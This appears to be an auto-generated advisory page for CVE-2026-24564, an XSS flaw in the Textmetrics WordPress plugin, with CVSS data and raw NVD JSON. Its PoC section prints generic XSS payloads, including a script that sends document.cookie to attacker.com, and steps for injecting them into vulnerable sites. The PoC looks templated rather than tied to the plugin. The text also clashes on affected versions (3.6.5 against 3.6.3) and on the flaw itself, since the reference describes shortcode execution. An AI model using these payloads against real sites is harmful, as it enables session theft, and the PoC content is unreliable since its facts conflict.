Security Vulnerability Report
CVE-2026-24564 CVSS 4.3 MEDIUM

CVE-2026-24564

Published: 2026-01-23 15:16:14
Last Modified: 2026-04-28 15:16:15

Description

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Israpil Textmetrics webtexttool allows Code Injection. This issue affects Textmetrics: from n/a through <= 3.6.5.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Textmetrics (webtexttool) all versions <= 3.6.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2026-24564 PoC - Stored XSS in Textmetrics WordPress Plugin -->
<!-- This PoC demonstrates the XSS vulnerability in Textmetrics plugin <= 3.6.5 -->
<!-- Affected Component: Textmetrics webtexttool input field -->

<!-- Basic XSS Payload -->
<script>alert('XSS - CVE-2026-24564')</script>

<!-- More sophisticated payload for session hijacking -->
<script>
// Steal cookies and send to attacker controlled endpoint
var stolen_data = document.cookie;
fetch('https://attacker.com/steal?data=' + encodeURIComponent(stolen_data));
</script>

<!-- Image tag XSS payload (bypasses some filters) -->
<img src=x onerror="alert('XSS Triggered')">

<!-- SVG XSS payload -->
<svg onload="alert('CVE-2026-24564 XSS')">

<!-- Event handler XSS payload -->
<body onload="alert('Stored XSS in Textmetrics')">

<!-- PoC Attack Steps:
1. Identify WordPress site with Textmetrics plugin <= 3.6.5
2. Navigate to Textmetrics plugin settings or content input area
3. Inject malicious XSS payload into any text field
4. Save/submit the content
5. When admin or other users view the page containing the injected content, the XSS payload will execute in their browser
6. Attacker can steal session cookies, perform actions as the victim, or redirect users to malicious sites
-->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24564", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:13.940", "lastModified": "2026-04-28T15:16:14.787", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Israpil Textmetrics webtexttool allows Code Injection.This issue affects Textmetrics: from n/a through <= 3.6.5."}, {"lang": "es", "value": "Neutralización Incorrecta de Etiquetas HTML Relacionadas con Scripts en una Página Web (XSS Básico) en Israpil Textmetrics webtexttool permite la Inyección de Código. Este problema afecta a Textmetrics: desde n/a hasta &lt;= 3.6.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/webtexttool/vulnerability/wordpress-textmetrics-plugin-3-6-3-arbitrary-shortcode-execution-vulnerability?_s_id=cve", "source": "[email protected]"}]}}